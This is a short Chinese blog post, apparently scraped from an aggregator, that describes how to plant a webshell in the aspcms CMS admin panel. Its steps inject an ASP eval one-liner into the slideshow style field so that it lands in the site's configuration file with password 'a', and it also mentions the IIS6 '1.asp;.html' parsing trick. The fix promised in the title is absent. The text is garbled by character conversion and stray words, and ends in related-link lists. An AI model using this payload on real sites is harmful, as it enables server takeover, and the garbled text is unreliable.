aspcms後臺拿shell漏洞(非添加模塊)及修復方法
aspcms在老版本中能夠經過添加模板直接添加asp.可是新版的aspcms中已經限制了添加模板的格式爲html,js,css,固然若是是遇到iis6的話仍是能夠經過iis6的解析漏洞把文件名改爲1.asp;.html這樣的格式來拿到shell的.但是若是遇到iis7.5呢?如下是本人本身找到挖掘到的aspcms通殺版本的後臺拿shell方法.
一、進入後臺,「擴展功能」--「幻燈片設置」--」幻燈樣式」css
二、使用chorme的審查元素功能或者firefox的firebug,總之使用能修改當前頁面元素的工具就行了。將對應的slidestyle的value的值修改成1%><%Eval(Request (chr(65)))%><%html
三、一句話***,密碼a。在/config/AspCms_Config.aspshell
4.ide
管理員漏洞工具
相關文章
- 1. 拿shell之CVE-2019-0708漏洞復現
- 2. 【WEB】aspcms漏洞利用
- 3. android添加帳戶流程分析涉及漏洞修復
- 4. WebLogic SSRF 及漏洞修復
- 5. ASP上傳漏洞拿shell
- 6. Web漏洞檢測及修復方案
- 7. JumpServer漏洞通知及修復方案
- 8. 淺談漏洞修復的方法論
- 9. emlog重大漏洞修復方法
- 10. 安全漏洞修復方法
- 更多相關文章...
- • Lua 模塊與包 - Lua 教程
- • Eclipse 快速修復 - Eclipse 教程
- • 委託模式
- • Flink 數據傳輸及反壓詳解
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. 拿shell之CVE-2019-0708漏洞復現
- 2. 【WEB】aspcms漏洞利用
- 3. android添加帳戶流程分析涉及漏洞修復
- 4. WebLogic SSRF 及漏洞修復
- 5. ASP上傳漏洞拿shell
- 6. Web漏洞檢測及修復方案
- 7. JumpServer漏洞通知及修復方案
- 8. 淺談漏洞修復的方法論
- 9. emlog重大漏洞修復方法
- 10. 安全漏洞修復方法